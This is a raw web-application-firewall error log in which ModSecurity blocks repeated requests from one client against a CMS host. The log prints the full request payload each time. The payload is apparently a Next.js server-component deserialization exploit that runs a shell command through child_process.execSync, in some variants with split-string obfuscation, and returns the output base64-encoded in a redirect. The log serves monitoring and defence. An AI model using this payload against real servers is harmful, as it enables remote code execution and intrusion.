"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _eqpm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _tnam=Buffer.from(_eqpm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_tnam};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G372Eyysfe77nnmW6MQAAAos"] [Sat Jan 31 02:03:43.102506 2026] [:error] [pid 29377:tid 29396] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cwxm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _uwnc=Buffer.from(_cwxm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uwnc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G372Eyysfe77nnmW6MgAAApE"] [Sat Jan 31 02:03:43.130391 2026] [:error] [pid 29377:tid 29393] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _szpe=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xgwv=Buffer.from(_szpe).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xgwv};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G372Eyysfe77nnmW6MwAAAo4"] [Sat Jan 31 02:03:43.158170 2026] [:error] [pid 29377:tid 29402] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uvnk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qwjm=Buffer.from(_uvnk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qwjm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6NAAAApc"] [Sat Jan 31 02:03:43.185636 2026] [:error] [pid 29377:tid 29385] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _unqh=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _dulr=Buffer.from(_unqh).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dulr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6NQAAAoY"] [Sat Jan 31 02:03:43.213124 2026] [:error] [pid 29377:tid 29403] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _aqbx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _eaub=Buffer.from(_aqbx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_eaub};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G372Eyysfe77nnmW6NgAAApg"] [Sat Jan 31 02:03:43.240474 2026] [:error] [pid 29377:tid 29384] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _njhu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _uyah=Buffer.from(_njhu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_uyah};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G372Eyysfe77nnmW6NwAAAoU"] [Sat Jan 31 02:03:43.269285 2026] [:error] [pid 29377:tid 29397] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zjqd=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _fyzd=Buffer.from(_zjqd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_fyzd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G372Eyysfe77nnmW6OAAAApI"] [Sat Jan 31 02:03:43.296776 2026] [:error] [pid 29377:tid 29392] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _zwpn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _lzre=Buffer.from(_zwpn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_lzre};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G372Eyysfe77nnmW6OgAAAo0"] [Sat Jan 31 02:03:43.325386 2026] [:error] [pid 29377:tid 29399] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pqxu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qrdu=Buffer.from(_pqxu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qrdu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6OwAAApQ"] [Sat Jan 31 02:03:43.352936 2026] [:error] [pid 29377:tid 29389] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hcdd=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _pihs=Buffer.from(_hcdd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pihs};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6PAAAAoo"] [Sat Jan 31 02:03:43.381851 2026] [:error] [pid 29377:tid 29388] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fdqe=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ibvy=Buffer.from(_fdqe).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ibvy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G372Eyysfe77nnmW6PQAAAok"] [Sat Jan 31 02:03:43.411009 2026] [:error] [pid 29377:tid 29386] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sqeb=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kdkz=Buffer.from(_sqeb).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kdkz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G372Eyysfe77nnmW6PgAAAoc"] [Sat Jan 31 02:03:43.439845 2026] [:error] [pid 29377:tid 29383] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _dixz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _kvbp=Buffer.from(_dixz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_kvbp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G372Eyysfe77nnmW6PwAAAoQ"] [Sat Jan 31 02:03:43.468971 2026] [:error] [pid 29377:tid 29379] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _hebj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jorp=Buffer.from(_hebj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jorp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aX1G372Eyysfe77nnmW6QAAAAoA"] [Sat Jan 31 02:03:43.496381 2026] [:error] [pid 29377:tid 29395] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vdth=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rnor=Buffer.from(_vdth).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rnor};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6QQAAApA"] [Sat Jan 31 02:03:43.524260 2026] [:error] [pid 29377:tid 29400] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _yssv=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ehgb=Buffer.from(_yssv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ehgb};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aX1G372Eyysfe77nnmW6QgAAApU"] [Sat Jan 31 02:03:43.553751 2026] [:error] [pid 29377:tid 29382] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lfwo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rywu=Buffer.from(_lfwo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rywu};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aX1G372Eyysfe77nnmW6QwAAAoM"] [Sat Jan 31 02:03:43.581899 2026] [:error] [pid 29377:tid 29398] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _sbud=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rgue=Buffer.from(_sbud).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rgue};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aX1G372Eyysfe77nnmW6RAAAApM"] [Sat Jan 31 02:03:43.609554 2026] [:error] [pid 29377:tid 29401] [client 195.178.110.31:59590] [client 195.178.110.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qzsk=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jgxg=Buffer.from(_qzsk).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jgxg};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aX1G372Eyysfe77nnmW6RQAAApY"] [Sat Jan 31 02:03:43.640286 2026] [:error] [pid 29377:tid 29391] [client 195.178.110.31:59590] [client 195.178.110.31] 